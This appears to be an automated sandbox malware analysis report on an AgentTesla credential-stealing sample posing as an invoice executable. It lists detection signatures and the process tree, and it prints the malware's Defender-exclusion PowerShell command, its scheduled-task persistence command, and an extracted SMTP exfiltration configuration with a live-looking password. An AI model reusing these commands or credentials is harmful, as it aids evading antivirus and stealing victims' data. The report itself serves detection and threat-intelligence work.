Edit tour

Windows Analysis Report
F#U0130YAT TEKL#U0130F#U0130-2400.exe

Overview

General Information

Sample name:	F#U0130YAT TEKL#U0130F#U0130-2400.exe renamed because original name is a hash value
Original sample name:	FYAT TEKLF-2400.exe
Analysis ID:	1515067
MD5:	2e6fc928822c8f9bb49e60b32e87f1ae
SHA1:	eccd6b4f0ad70c48757078f4870e1d45263771c8
SHA256:	28c597dffa4e58341d159876a809955f673bae6115787910d41080ef7ba2a6f0
Tags:	exeFormbookgeoTURuser-abuse_ch
Infos:

Detection

AgentTesla

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Scheduled temp file as task from temp location

Yara detected AgentTesla

Yara detected AntiVM3

.NET source code contains potential unpacker

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Check if machine is in data center or colocation facility

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Contains functionality to log keystrokes (.Net Source)

Injects a PE file into a foreign processes

Installs a global keyboard hook

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Machine Learning detection for sample

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file / registry access)

Uses schtasks.exe or at.exe to add and modify task schedules

Yara detected Generic Downloader

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if the current process is being debugged

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a window with clipboard capturing capabilities

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Powershell Defender Exclusion

Sigma detected: Suspicious Add Scheduled Task Parent

Sigma detected: Suspicious Outbound SMTP Connections

Sigma detected: Suspicious Schtasks From Env Var Folder

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

F#U0130YAT TEKL#U0130F#U0130-2400.exe (PID: 6596 cmdline: "C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe" MD5: 2E6FC928822C8F9BB49E60B32E87F1AE)

powershell.exe (PID: 7108 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 7116 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 3512 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\cYDnGbgU.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 6008 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WmiPrvSE.exe (PID: 7280 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

schtasks.exe (PID: 4592 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\cYDnGbgU" /XML "C:\Users\user\AppData\Local\Temp\tmp38F1.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 2840 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

F#U0130YAT TEKL#U0130F#U0130-2400.exe (PID: 7048 cmdline: "C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe" MD5: 2E6FC928822C8F9BB49E60B32E87F1AE)

cYDnGbgU.exe (PID: 2836 cmdline: C:\Users\user\AppData\Roaming\cYDnGbgU.exe MD5: 2E6FC928822C8F9BB49E60B32E87F1AE)

schtasks.exe (PID: 7400 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\cYDnGbgU" /XML "C:\Users\user\AppData\Local\Temp\tmp4A37.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 7408 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cYDnGbgU.exe (PID: 7444 cmdline: "C:\Users\user\AppData\Roaming\cYDnGbgU.exe" MD5: 2E6FC928822C8F9BB49E60B32E87F1AE)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Agent Tesla, AgentTesla	A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.	SWEED	http://blog.nsfocus.net/sweed-611/ http://l1v1ngc0d3.wordpress.com/2021/11/12/agenttesla-dropped-via-nsis-installer/ http://ropgadget.com/posts/originlogger.html http://www.secureworks.com/research/threat-profiles/gold-galleon https://0xmrmagnezi.github.io/malware%20analysis/AgentTesla/	https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.usgrovemall.com", "Username": "contact@usgrovemall.com", "Password": "Maximzed@#$#"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
0000000D.00000002.4149137493.00000000033A6000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000008.00000002.4148813369.00000000028AE000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0000000D.00000002.4149137493.00000000033B0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0000000D.00000002.4149137493.000000000339E000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000008.00000002.4148813369.0000000002884000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000008.00000002.4148813369.0000000002884000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000000.00000002.1756426531.00000000042A6000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1756426531.00000000042A6000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000008.00000002.4148813369.00000000028C0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000009.00000002.1796054239.0000000004292000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000009.00000002.1796054239.0000000004292000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0000000D.00000002.4149137493.0000000003375000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000D.00000002.4149137493.0000000003375000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000008.00000002.4148813369.00000000028B6000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000000.00000002.1756426531.0000000003981000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1756426531.0000000003981000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: F#U0130YAT TEKL#U0130F#U0130-2400.exe PID: 6596	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: F#U0130YAT TEKL#U0130F#U0130-2400.exe PID: 6596	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: F#U0130YAT TEKL#U0130F#U0130-2400.exe PID: 6596	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: F#U0130YAT TEKL#U0130F#U0130-2400.exe PID: 7048	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: F#U0130YAT TEKL#U0130F#U0130-2400.exe PID: 7048	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: cYDnGbgU.exe PID: 2836	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: cYDnGbgU.exe PID: 2836	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: cYDnGbgU.exe PID: 2836	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: cYDnGbgU.exe PID: 7444	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: cYDnGbgU.exe PID: 7444	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Click to see the 21 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
8.2.F#U0130YAT TEKL#U0130F#U0130-2400.exe.400000.0.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
9.2.cYDnGbgU.exe.4292550.9.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
9.2.cYDnGbgU.exe.4292550.9.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
9.2.cYDnGbgU.exe.4292550.9.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x324e5:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x32557:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x325e1:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x32673:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x326dd:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x3274f:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x327e5:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x32875:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
9.2.cYDnGbgU.exe.42cdd70.8.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
9.2.cYDnGbgU.exe.42cdd70.8.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
9.2.cYDnGbgU.exe.42cdd70.8.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0.2.F#U0130YAT TEKL#U0130F#U0130-2400.exe.39bcdb8.9.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.F#U0130YAT TEKL#U0130F#U0130-2400.exe.39bcdb8.9.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
9.2.cYDnGbgU.exe.42cdd70.8.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x342e5:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x34357:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x343e1:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x34473:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x344dd:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x3454f:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x345e5:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x34675:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
0.2.F#U0130YAT TEKL#U0130F#U0130-2400.exe.39bcdb8.9.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x324e5:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x32557:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x325e1:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x32673:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x326dd:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x3274f:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x327e5:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x32875:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
0.2.F#U0130YAT TEKL#U0130F#U0130-2400.exe.3981598.8.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.F#U0130YAT TEKL#U0130F#U0130-2400.exe.3981598.8.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0.2.F#U0130YAT TEKL#U0130F#U0130-2400.exe.3981598.8.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x324e5:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x32557:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x325e1:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x32673:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x326dd:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x3274f:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x327e5:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x32875:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
9.2.cYDnGbgU.exe.42cdd70.8.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
9.2.cYDnGbgU.exe.42cdd70.8.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
9.2.cYDnGbgU.exe.42cdd70.8.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x324e5:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x32557:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x325e1:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x32673:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x326dd:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x3274f:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x327e5:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x32875:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
9.2.cYDnGbgU.exe.4292550.9.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
9.2.cYDnGbgU.exe.4292550.9.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
9.2.cYDnGbgU.exe.4292550.9.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
9.2.cYDnGbgU.exe.4292550.9.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x342e5:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x6fb05:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x34357:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x6fb77:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x343e1:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x6fc01:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x34473:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x6fc93:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x344dd:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x6fcfd:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x3454f:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x6fd6f:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x345e5:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x6fe05:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x34675:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548 0x6fe95:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
0.2.F#U0130YAT TEKL#U0130F#U0130-2400.exe.39bcdb8.9.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.F#U0130YAT TEKL#U0130F#U0130-2400.exe.39bcdb8.9.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.F#U0130YAT TEKL#U0130F#U0130-2400.exe.39bcdb8.9.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0.2.F#U0130YAT TEKL#U0130F#U0130-2400.exe.39bcdb8.9.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x342e5:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x34357:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x343e1:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x34473:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x344dd:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x3454f:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x345e5:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x34675:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
0.2.F#U0130YAT TEKL#U0130F#U0130-2400.exe.3981598.8.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.F#U0130YAT TEKL#U0130F#U0130-2400.exe.3981598.8.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.F#U0130YAT TEKL#U0130F#U0130-2400.exe.3981598.8.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0.2.F#U0130YAT TEKL#U0130F#U0130-2400.exe.3981598.8.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x342e5:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x6fb05:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x34357:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x6fb77:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x343e1:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x6fc01:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x34473:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x6fc93:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x344dd:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x6fcfd:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x3454f:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x6fd6f:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x345e5:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x6fe05:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x34675:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548 0x6fe95:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
Click to see the 24 entries

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe", ParentImage: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe, ParentProcessId: 6596, ParentProcessName: F#U0130YAT TEKL#U0130F#U0130-2400.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe", ProcessId: 7108, ProcessName: powershell.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Suspicious Add Scheduled Task Parent

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\cYDnGbgU" /XML "C:\Users\user\AppData\Local\Temp\tmp4A37.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\cYDnGbgU" /XML "C:\Users\user\AppData\Local\Temp\tmp4A37.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\cYDnGbgU.exe, ParentImage: C:\Users\user\AppData\Roaming\cYDnGbgU.exe, ParentProcessId: 2836, ParentProcessName: cYDnGbgU.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\cYDnGbgU" /XML "C:\Users\user\AppData\Local\Temp\tmp4A37.tmp", ProcessId: 7400, ProcessName: schtasks.exe

Sigma detected: Suspicious Outbound SMTP Connections

Source: Network Connection

Author: frack113: Data: DestinationIp: 192.250.227.28, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe, Initiated: true, ProcessId: 7048, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49736

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\cYDnGbgU" /XML "C:\Users\user\AppData\Local\Temp\tmp38F1.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\cYDnGbgU" /XML "C:\Users\user\AppData\Local\Temp\tmp38F1.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe", ParentImage: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe, ParentProcessId: 6596, ParentProcessName: F#U0130YAT TEKL#U0130F#U0130-2400.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\cYDnGbgU" /XML "C:\Users\user\AppData\Local\Temp\tmp38F1.tmp", ProcessId: 4592, ProcessName: schtasks.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe", ParentImage: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe, ParentProcessId: 6596, ParentProcessName: F#U0130YAT TEKL#U0130F#U0130-2400.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe", ProcessId: 7108, ProcessName: powershell.exe

Persistence and Installation Behavior

Sigma detected: Scheduled temp file as task from temp location

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\cYDnGbgU" /XML "C:\Users\user\AppData\Local\Temp\tmp38F1.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\cYDnGbgU" /XML "C:\Users\user\AppData\Local\Temp\tmp38F1.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe", ParentImage: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe, ParentProcessId: 6596, ParentProcessName: F#U0130YAT TEKL#U0130F#U0130-2400.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\cYDnGbgU" /XML "C:\Users\user\AppData\Local\Temp\tmp38F1.tmp", ProcessId: 4592, ProcessName: schtasks.exe

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: F#U0130YAT TEKL#U0130F#U0130-2400.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe

Avira: detection malicious, Label: HEUR/AGEN.1308740

Found malware configuration

Source: 0.2.F#U0130YAT TEKL#U0130F#U0130-2400.exe.3981598.8.raw.unpack

Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.usgrovemall.com", "Username": "contact@usgrovemall.com", "Password": "Maximzed@#$#"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	ReversingLabs: Detection: 79%
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Virustotal: Detection: 79%			Perma Link

Multi AV Scanner detection for submitted file

Source: F#U0130YAT TEKL#U0130F#U0130-2400.exe	ReversingLabs: Detection: 79%
Source: F#U0130YAT TEKL#U0130F#U0130-2400.exe	Virustotal: Detection: 79%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.8% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: F#U0130YAT TEKL#U0130F#U0130-2400.exe

Joe Sandbox ML: detected

Source: F#U0130YAT TEKL#U0130F#U0130-2400.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.4:49738 version: TLS 1.2

Source: F#U0130YAT TEKL#U0130F#U0130-2400.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Networking

Yara detected Generic Downloader

